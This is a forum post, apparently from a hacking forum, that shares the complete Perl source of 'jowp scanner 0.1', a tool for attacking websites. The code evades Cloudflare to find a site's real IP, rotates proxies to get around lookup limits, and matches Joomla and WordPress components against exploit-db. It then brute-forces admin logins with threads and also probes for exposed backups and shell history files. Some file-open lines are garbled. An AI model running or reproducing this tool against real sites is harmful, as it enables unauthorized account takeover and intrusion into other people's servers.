sQuo Posted May 3, 2014 Share Posted May 3, 2014 This is the hidden content, please Sign In or Sign Up [HIDE-THANKS] [LENGUAJE=perl]#!/usr/bin/perl # jowp scanner 0.1 # © sec4ever use LWP::UserAgent; use WWW::Mechanize; use threads; $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"); $ua->timeout(30); $defext = "php"; $| = 1; $threads = 10; head(); print "[+] Enter ip - site[(s) file] : "; $choice=; chomp($choice); if ($choice =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { print " + you're entering an ip address : ".$choice."\n"; dojob($choice); } elsif($choice =~ /\.txt/) { print " + you are entering a file : ".$choice."\n"; open(sites, " @sites=; close(sites); print " + Total Sites : ".scalar(@sites)."\n"; }else{ print " + you are entering a site : ".$choice."\n"; $ip = getip($choice); print " + ip : ".$ip."\n"; dojob($ip); } sub dojob { ureverse($_[0]); open(sites, " @sites=; close(sites); } foreach $site (@sites) { chomp($site); $main = $ua->get("http://".$site."/")->content; if ($main =~ m/joomla/ || $main =~ m/\/component\// || $main =~ m/com\_/) { print " * ".$site." joomla\n"; scanjoomla($site); brutjoomla($site); check($site); } elsif ($main =~ /wordpress/ || $main =~ /wp\-content/ || $main =~ /wp\-includes/) { print " * ".$site." wordpress\n"; scanwordpress($site); brutwordpress($site); check($site); }else{ print " * ".$site." unknown\n"; check($site); } } sub check { checkdirs($_[0]); checkcommon($_[0]); } sub ureverse { reversesned: $response = $ua->post("http://domains.yougetsignal.com/domains.php", { remoteAddress => $_[0]}); $pwnd = $response->content; if ($pwnd =~ /Daily reverse IP check limit reached for/) { print " - limit reached, bypassing ...\n"; $getproxy = gproxy(); $ua->proxy('http', $getproxy); goto reversesned; }elsif ($pwnd =~ /\"domainCount\":\"(.*?)\"/){ print " + Total Sites : ".$1."\n"; while ($pwnd =~ m/\[\"(.*?)\",/sg){ $group{$1} = undef; } foreach $s (keys %group) { savefile("sites-".$_[0].".txt",$s); } } } sub gproxy { open(DAT,"proxies.txt"); @proxys=; close(DAT); foreach $proxy (@proxys) { chomp($proxy); $proxy = "http://".$proxy if ($proxy !~ m/http:\/\//); $ua->proxy('http', $proxy); if ($ua->get("http://domains.yougetsignal.com/domains.php")->content !~ /Daily reverse IP check limit reached for/) { print "+ ".$proxy." valid \n"; $ua->proxy('http', $proxy); return $proxy; } } } sub getip { $getip = $ua->get("http://".$_[0]."/"); $getiphead = $getip->headers()->as_string; if ($getiphead =~ /Server: cloudflare-nginx/) { print " + Cloudflare Detected , bypassing ...\n"; cloudbypass($_[0]); subdom($_[0]); print "\n * Enter an ip to use : "; chomp($nip=); return $nip; }elsif ($getiphead =~ /Client-Peer: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):/) { chomp($1); return $1; } else{ $!; print " error here 1\n"; } } sub cloudbypass{ my $cloudbypass = $ua->post("http://www.cloudflare-watch.org/cgi-bin/cfsearch.cgi", { cfS => $_[0], }); if ($cloudbypass->content =~ m/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/){ chomp($1); print " + method 1, ip : ".$1."\n"; }else{ print " - Can't, using method 2 \n"; } } sub subdom { open(subs,"subs.txt"); @subs=; close(subs); foreach $sub (@subs) { chomp($sub); $getsub = $ua->get("http://".$sub.".".$_[0]."/"); $getsubhead = $getsub->headers()->as_string; if ($getsubhead !~ /Client-Warning: Internal response/) { if ($getsubhead !~ /Server: cloudflare-nginx/) { print " + ".$sub.".".$_[0]." "; print $getsubhead =~ /Client-Peer: (.*?):/ ? $1."\n" : " can't get ip\n"; } else { print " + ".$sub.".".$_[0]." "; print $getsubhead =~ /Client-Peer: (.*?):/ ? $1." is under cloudflare\n" : " can't get ip\n"; } }else{ print " - ".$sub.".".$_[0]." not found\n"; } } } sub scanjoomla { $scanjoom = $ua->get("http://".$_[0]."/index.php"); $scanjoomcont = $scanjoom->content; while ($scanjoomcont =~ /\/components\/(.*?)\//gi){$compo1{$1} = undef;} while ($scanjoomcont =~ /\?option=(.*?)\&\;/gi){$compo2{$1} = undef;} while ($scanjoomcont =~ /\/component\/option\,(.*?)\//gi){$compo3{$1} = undef;} while ($scanjoomcont =~ /\/index\.php\/component\/(.*?)\//gi){$compo4{$1} = undef;} #\/index\.php\/component\/(.*?)\/ foreach $com1 (keys %compo1) {push(@compo,$com1);} foreach $com2 (keys %compo2) {push(@compo,$com2);} foreach $com3 (keys %compo3) {push(@compo,$com3);} foreach $com4 (keys %compo4) {push(@compo,$com4);} print " + components \n"; foreach $com (uniq(@compo)) { print "\t\t# ".$com." : "; checkexdb($com); } print "\n"; } sub scanwordpress { #preg_match_all('#/wp-content/plugins/(.*?)/#si', $metals , $amks ); #preg_match_all('##si', $metals , $amks2 ); # $scanwp = $ua->get("http://".$_[0]."/"); $scanwpcont = $scanwp->content; while ($scanwpcont =~ /\/wp\-content\/plugins\/(.*?)\//gi){$plug1{$1} = undef;} if ($scanwpcont =~ /\/wp\-content\/themes\/(.*?)\//gi){push(@plug,$1);} foreach $plu1 (keys %plug1) {push(@plug,$plu1);} print " + plugin \n"; foreach $plu (uniq(@plug)) { print "\t\t# ".$plu." : "; checkexdb($plu); } print "\n"; } sub checkexdb { $checkexdbex = $ua->get("http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$_[0]."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve"); $checkexdbexcont = $checkexdbex->content; #s http://www.exploit-db.com/exploits/'>http://www.exploit-db.com/exploits/ my %checkjoomex; if ($checkexdbexcont !~ /\">No results/) { while ($checkexdbexcont =~ m/\/exploits\/(.*?)[\n]?/gi) { $checkjoomex{$1} = undef; } foreach $ex (keys %checkjoomex) { @ex = split(/">/,$ex); print "\n\t\t\t ".@ex[1]."\n"; print "\t\t\t http://www.exploit-db.com/exploits/".@ex[0]."\n"; } } else { print "no exploit\n"; } @ex = undef; } sub brutwordpress { @usrs = undef; @pwds = undef; print " + bruteforcing (threads: $threads)\n"; $bwpred = "http://".$_[0]."/wp-admin/"; $bwpu = getadminwp($_[0]); if (length($bwpu) print " - faild to get admin name, using list\n"; open (usr, " @usrs = ; close usr; @usergenwp = split(/\./,$_[0]); push(@usrs,$_[0]); push(@users,@usergenwp[0]); }else{ print " + found admin name : ".$bwpu."\n"; @usrs = ($bwpu); } open (pwd, " @pwds = ; close pwd; @passgenwp = split(/\./,$_[0]); push(@pwds,@passgenwp[0]); foreach $usr (@usrs) { foreach $pwd (@pwds) { chomp($usr); chomp($pwd); push(@threads, threads->create (\&bfwp2, $_[0],$usr,$pwd,$bwpred)); sleep(1) while(scalar threads->list(threads::running) >= $threads); } } $_->join foreach @threads; @threads = (); } sub bfwp2 { eval { $wpbf = WWW::Mechanize->new(timeout => 10); $wpbf->get("http://".$_[0]."/wp-login.php"); $wpbf->submit_form( fields => { "log" => $_[1], "pwd" => $_[2], "redirect_to" => $_[3], "testcookie" => "1",}); }; if($wpbf->content() =~ /wp-admin\/load-styles/){ print "\t# cracked, user: ".$_[1]." pass: ".$_[2]."\n"; }else{ print "\t- faild, user: ".$_[1]." pass: ".$_[2]; print "\n"; } } sub brutjoomla { @usrs = undef; @pwds = undef; print " + bruteforcing (threads: $threads)\n"; $jotoken = getjooken($_[0]); open (usr, " @usrs = ; close usr; open (pwd, " @pwds = ; close pwd; push(@usrs,$_[0]); push(@pwds,$_[0]); @authgen = split(/\./,$_[0]); push(@usrs,@authgen[0]); push(@pwds,@authgen[0]); foreach $usr (@usrs) { foreach $pwd (@pwds) { chomp($usr); chomp($pwd); push(@threads, threads->create (\&bfjo2, $_[0],$usr,$pwd,$jotoken)); sleep(1) while(scalar threads->list(threads::running) >= $threads); } } $_->join foreach @threads; @threads = (); } sub bfjo2 { eval { $jobfr = WWW::Mechanize->new(timeout => 10); $jobfr->get("http://".$_[0]."/administrator/index.php"); $jobfr->submit_form( fields => { username => $_[1], passwd => $_[2], task => 'login', $_[3] => '1', }); }; if($jobfr->content() =~ /com_categories/i || $jobfr->content() =~ /com_config/i || $jobfr->content() =~ /com_admin/i){ print "\t# cracked, user: ".$_[1]." pass: ".$_[2]."\n"; }else{ print "\t- faild, user: ".$_[1]." pass: ".$_[2]; } print "\n"; } sub getadminwp { $getadmin = $ua->get("http://".$_[0]."?author=1"); $getadminhead = $getadmin->headers()->as_string; $getadmincont = $getadmin->content; if ($getadmincont =~ /(.*?) \| /) { chomp($1); return($1); }elsif ($getadminhead =~ /Title: (.*?) /) { chomp($1); return($1); } } sub checkdirs { print " + scanning dirs \n"; open (dir, " @dirs = ; close dir; $countd=0; @tocheckfiles = undef; foreach $dir (@dirs) { chomp($dir); $countd++; $scanp = $ua->get("http://".$_[0]."/".$dir."/"); if ($scanp->status_line !~ /404/){ if ($scanp->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countd."/".scalar(@dirs)." + found : http://".$_[0]."/".$dir."/ ".$scanp->status_line."\n"; push(@tocheckfiles,$dir); }} else{ print "\r\t ".$countd."/".scalar(@dirs)." - not found : http://".$_[0]."/".$dir."/ "; } } print "\n"; foreach $tocheckdir (uniq(@tocheckfiles)) {checkfiles($_[0],"/".$tocheckdir);} } sub checkfiles { # bam bam ;) print " + scanning files for dir : ".$_[1]."\n"; open (path, " @paths = ; close path; $countp=0; $scanpi = $ua->get("http://".$_[0]."/"); $scanphead = $scanpi->headers()->as_string; if ($scanphead =~ /X-Powered-By\: PHP/){@ext = ("php");print "\t using extention : php for files\n";}elsif($scanphead =~ /X-Powered-By\: ASP\.NET/){ @ext = ("aspx","asp"); print "\t using extention : aspx,asp for files\n"; }else{@ext = ($defext); print "\t using default extention : ".$defext." for files\n";} foreach $filescan (@paths) { chomp($filescan); $countp++; foreach $fext (@ext) { $scanp = $ua->get("http://".$_[0].$_[1]."/".$filescan.".".$fext); if ($scanp->status_line !~ /404/){ if ($scanp->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countp."/".scalar(@paths)." + found : http://".$_[0].$_[1]."/".$filescan.".".$fext." ".$scanp->status_line."\n"; } } else{ print "\r\t ".$countp."/".scalar(@paths)." - not found : http://".$_[0].$_[1]."/".$filescan.".".$fext; } } } print "\n"; } sub checkcommon { print " + scanning common files \n"; @cpaths = ("validator.php","uploader.php","vbseo.php","test.txt","test.zip","public_html.zip","pulic_html.rar","public_html.tar.gz","backup.zip","backup.tar.gz",".bash_history","error_log","domlogs"); $countcp=0; foreach $filecscan (@cpaths) { chomp($filecscan); $countcp++; $scanpc = $ua->get("http://".$_[0]."/".$filecscan); if ($scanpc->status_line !~ /404/){ if ($scanpc->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countcp."/".scalar(@cpaths)." + found : http://".$_[0]."/".$filecscan." ".$scanpc->status_line."\n"; } } else{ print "\r\t ".$countcp."/".scalar(@cpaths)." - not found : http://".$_[0]."/".$filecscan; } } print "\n"; } sub getjooken { $gjotoken = WWW::Mechanize->new(); $gjotoken->get("http://".$_[0]."/administrator/index.php"); if($gjotoken->content() =~ /([0-9a-fA-F]{32})/){ print " + found token \n"; chomp($1); return $1; } else { print " - can't get token \n"; next; } } sub savefile { open (save,">>".$_[0]); print save $_[1]."\n"; close save; } sub uniq { return keys %{{ map { $_ => 1 } @_ }}; } sub head { print qq { [+] jowp scanner 0.1 [+] © sec4ever } }[/LENGUAJE][/HIDE-THANKS] Link to comment Share on other sites More sharing options...
Recommended Posts